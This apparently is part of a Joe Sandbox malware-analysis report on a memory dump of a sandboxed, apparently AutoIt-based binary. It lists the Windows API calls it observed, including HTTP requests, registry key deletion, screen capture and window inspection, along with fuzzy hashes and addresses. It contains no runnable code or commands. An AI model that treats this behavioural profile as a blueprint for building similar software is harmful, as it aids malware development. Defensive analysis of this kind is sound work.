• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: 9c62f5e49cf455c24381014a1635b6e3dd9c4fbafa394b4bbd7db384fa34e452
• Instruction ID: 39a355700309ab6b01b8128ab64a8debe2b4c6421537d3fd613a5b34324af842
• Opcode Fuzzy Hash: 9c62f5e49cf455c24381014a1635b6e3dd9c4fbafa394b4bbd7db384fa34e452
• Instruction Fuzzy Hash: FD717574104340AFDB21CF28DC58EBABBE9FB99304F04481EF99987261C7B1A966CB55
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• DragQueryPoint.SHELL32(?,?), ref: 00169147
  • Part of subcall function 00167674: ClientToScreen.USER32(?,?), ref: 0016769A
  • Part of subcall function 00167674: GetWindowRect.USER32(?,?), ref: 00167710
  • Part of subcall function 00167674: PtInRect.USER32(?,?,00168B89), ref: 00167720
• SendMessageW.USER32(?,000000B0,?,?), ref: 001691B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001691BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001691DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00169225
• SendMessageW.USER32(?,000000B0,?,?), ref: 0016923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00169255
• SendMessageW.USER32(?,000000B1,?,?), ref: 00169277
• DragFinish.SHELL32(?), ref: 0016927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00169371
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 221274066-3440237614
• Opcode ID: 8b5be5822b7a50ec040e27db638679dbc122aed4fd244e13e9dbbf21c9a24cef
• Instruction ID: f3c31dad3d2a07a6ba0026477db686340dda8ffb5ed0395d66e84f7659b1642c
• Opcode Fuzzy Hash: 8b5be5822b7a50ec040e27db638679dbc122aed4fd244e13e9dbbf21c9a24cef
• Instruction Fuzzy Hash: 19615A71108301AFD701EF64DC85DAFBBE8FF89750F40092EF595922A1DB709A49CBA2
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0014C4B0
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0014C4C3
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0014C4D7
                                                                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0014C4F0
                                                                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0014C533
                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0014C549
                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0014C554
                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0014C584
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0014C5DC
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0014C5F0
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0014C5FB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 4ad72484ebdef0d09d64011113c0f31e0dc627519e35d9b15ce8b818b70c9cc7
                                                                                                                                                                                                                                          • Instruction ID: 02bb53bb653ab7d49d80c4fa53b7b4a0d079a871b4e80425cd4a72604eb23af0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad72484ebdef0d09d64011113c0f31e0dc627519e35d9b15ce8b818b70c9cc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515DB1601209BFDB619FA4CD48ABB7BBCFF08754F008419F98596620DB74E9449BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00168592
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685A2
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685AD
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685BA
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685C8
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685D7
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685E0
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685E7
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685F8
                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0016FC38,?), ref: 00168611
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00168621
                                                                                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00168641
                                                                                                                                                                                                                                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00168671
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00168699
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001686AF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                                                                          • Opcode ID: bebc67e6ac53126d91a66c2ad088c2358fdcd7de892443af6bdd40b296447f6a
                                                                                                                                                                                                                                          • Instruction ID: f11e9c553961cb370b24fe629fe029a6cdf7b6d1218be145b1dc47d8803a71f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bebc67e6ac53126d91a66c2ad088c2358fdcd7de892443af6bdd40b296447f6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3411875600208AFDB119FA5DC48EAA7BB8FF89B15F104159F946E7260DB709941CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00141502
                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0014150B
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00141517
                                                                                                                                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001415FB
                                                                                                                                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00141657
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00141708
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0014178C
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001417D8
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001417E7
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00141823
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                          • API String ID: 1234038744-3931177956
                                                                                                                                                                                                                                          • Opcode ID: 13debfd175d5737dd3deabf689a647942c8b2a34e2b6d1c9ab4496f5901487d5
                                                                                                                                                                                                                                          • Instruction ID: 61914cc9487fe009b7ff303b209f3838fe9b82f79d536092ef272f712bfb17c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13debfd175d5737dd3deabf689a647942c8b2a34e2b6d1c9ab4496f5901487d5
• Instruction Fuzzy Hash: D1D1F032A00219EFDB04AF65D885BF9B7B5BF46700F118056E446AF2A1DB70EC81DBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015B6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 0015B80A
• RegCloseKey.ADVAPI32(?), ref: 0015B87E
• RegCloseKey.ADVAPI32(?), ref: 0015B89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0015B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0015B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0015B922
• FreeLibrary.KERNEL32(00000000), ref: 0015B983
• RegCloseKey.ADVAPI32(00000000), ref: 0015B994
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 0539d2800cab07a2f4dcf12b6a340ca571756c006c544ff2973b0bfad8efa831
• Instruction ID: 91b2d92d814aedaff15ec02db0ba5cf24f45c3eed7221c5997ca9f335a018870
• Opcode Fuzzy Hash: 0539d2800cab07a2f4dcf12b6a340ca571756c006c544ff2973b0bfad8efa831
• Instruction Fuzzy Hash: 37C16934208201EFD714DF14C495F6ABBE5AF84309F14859DF8AA8B7A2CB71E949CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 001525D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001525E8
• CreateCompatibleDC.GDI32(?), ref: 001525F4
• SelectObject.GDI32(00000000,?), ref: 00152601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0015266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001526AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001526D0
• SelectObject.GDI32(?,?), ref: 001526D8
• DeleteObject.GDI32(?), ref: 001526E1
• DeleteDC.GDI32(?), ref: 001526E8
• ReleaseDC.USER32(00000000,?), ref: 001526F3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: a4d8d7095bd2bf27dc5e01d65025576ac1f3c69c84ce653be919fc408cbc9d1f
• Instruction ID: 76ef47248937028d0373279e27f50c15273c8a8cc6497d2939b831dcdd7f9b6f
• Opcode Fuzzy Hash: a4d8d7095bd2bf27dc5e01d65025576ac1f3c69c84ce653be919fc408cbc9d1f
• Instruction Fuzzy Hash: AE61D3B6D00219EFCF04CFA8DC84AAEBBB6FF58310F208529E955A7250D774A951CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0010DAA1
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D659
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D66B
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D67D
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D68F
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6A1
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6B3
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6C5
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6D7
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6E9
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D6FB
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D70D
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D71F
  • Part of subcall function 0010D63C: _free.LIBCMT ref: 0010D731
• _free.LIBCMT ref: 0010DA96
  • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
  • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
• _free.LIBCMT ref: 0010DAB8
• _free.LIBCMT ref: 0010DACD
• _free.LIBCMT ref: 0010DAD8
• _free.LIBCMT ref: 0010DAFA
• _free.LIBCMT ref: 0010DB0D
• _free.LIBCMT ref: 0010DB1B
• _free.LIBCMT ref: 0010DB26
• _free.LIBCMT ref: 0010DB5E
• _free.LIBCMT ref: 0010DB65
• _free.LIBCMT ref: 0010DB82
• _free.LIBCMT ref: 0010DB9A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 98d79d8c10005bef5d4aa541699ba570037ddb60e0b8df68c608b42caf4e2ae7
• Instruction ID: 957412ac51b83ce6087bf1d76a0386c25577445038dde112a02a530a1cf29146
• Opcode Fuzzy Hash: 98d79d8c10005bef5d4aa541699ba570037ddb60e0b8df68c608b42caf4e2ae7
• Instruction Fuzzy Hash: 1C312A316046099FEB21AAB9E849B5A77E9FF21314F254429E4C9D71D1DFB5EC40CB20
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0013369C
• _wcslen.LIBCMT ref: 001336A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00133797
• GetClassNameW.USER32(?,?,00000400), ref: 0013380C
• GetDlgCtrlID.USER32(?), ref: 0013385D
• GetWindowRect.USER32(?,?), ref: 00133882
• GetParent.USER32(?), ref: 001338A0
• ScreenToClient.USER32(00000000), ref: 001338A7
• GetClassNameW.USER32(?,?,00000100), ref: 00133921
• GetWindowTextW.USER32(?,?,00000400), ref: 0013395D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: 31887be5407a677b5c8ef7956c02b9ab4479295103144d743a184ed0da15714c
• Instruction ID: 526431bcbf59ceadf9513b7482a19aa16358da993a5a6fb57c1ba8a647a76a60
• Opcode Fuzzy Hash: 31887be5407a677b5c8ef7956c02b9ab4479295103144d743a184ed0da15714c
• Instruction Fuzzy Hash: AA91C471204606EFD719DF24C885BFAF7A8FF44354F008629FAA9D2190DB70EA45CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00134994
• GetWindowTextW.USER32(?,?,00000400), ref: 001349DA
• _wcslen.LIBCMT ref: 001349EB
• CharUpperBuffW.USER32(?,00000000), ref: 001349F7
• _wcsstr.LIBVCRUNTIME ref: 00134A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00134A64
• GetWindowTextW.USER32(?,?,00000400), ref: 00134A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00134AE6
• GetClassNameW.USER32(?,?,00000400), ref: 00134B20
• GetWindowRect.USER32(?,?), ref: 00134B8B
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 1c24f84b75e1375d435bf1cbfbc35371dd0b0c30b1a9c975ae63bf88db6322e5
• Instruction ID: 4f37a5b880c22bc0f397333456268dd1a07236d275ba9a387201f321365d1012
• Opcode Fuzzy Hash: 1c24f84b75e1375d435bf1cbfbc35371dd0b0c30b1a9c975ae63bf88db6322e5
• Instruction Fuzzy Hash: 3B91AF711042099FDB04DF14C985BBABBE8FF84314F04846AFD869A19ADB74FD45CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00168D5A
• GetFocus.USER32 ref: 00168D6A
• GetDlgCtrlID.USER32(00000000), ref: 00168D75
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00168E1D
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00168ECF
• GetMenuItemCount.USER32(?), ref: 00168EEC
• GetMenuItemID.USER32(?,00000000), ref: 00168EFC
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00168F2E
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00168F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00168FA1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0
• API String ID: 1026556194-4108050209
• Opcode ID: e867ccbb907cd37224137f50f2e6c905f7fb8710b3f551fc7fe1618e2da6b4a0
• Instruction ID: 1d0343f0324aecd9a4ceb0a3587510b795a7ba32547c4e6dd7af0d6a3d6d0858
• Opcode Fuzzy Hash: e867ccbb907cd37224137f50f2e6c905f7fb8710b3f551fc7fe1618e2da6b4a0
• Instruction Fuzzy Hash: 0B81B071608301AFDB10CF24CC84ABBBBE9FB89314F044A5DF98597291DB71D951CBA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(001A1990,000000FF,00000000,00000030), ref: 0013BFAC
• SetMenuItemInfoW.USER32(001A1990,00000004,00000000,00000030), ref: 0013BFE1
• Sleep.KERNEL32(000001F4), ref: 0013BFF3
• GetMenuItemCount.USER32(?), ref: 0013C039
• GetMenuItemID.USER32(?,00000000), ref: 0013C056
• GetMenuItemID.USER32(?,-00000001), ref: 0013C082
• GetMenuItemID.USER32(?,?), ref: 0013C0C9
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0013C10F
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013C124
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013C145
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                          • String ID: 0
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0013DC20
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0013DC46
• _wcslen.LIBCMT ref: 0013DC50
• _wcsstr.LIBVCRUNTIME ref: 0013DCA0
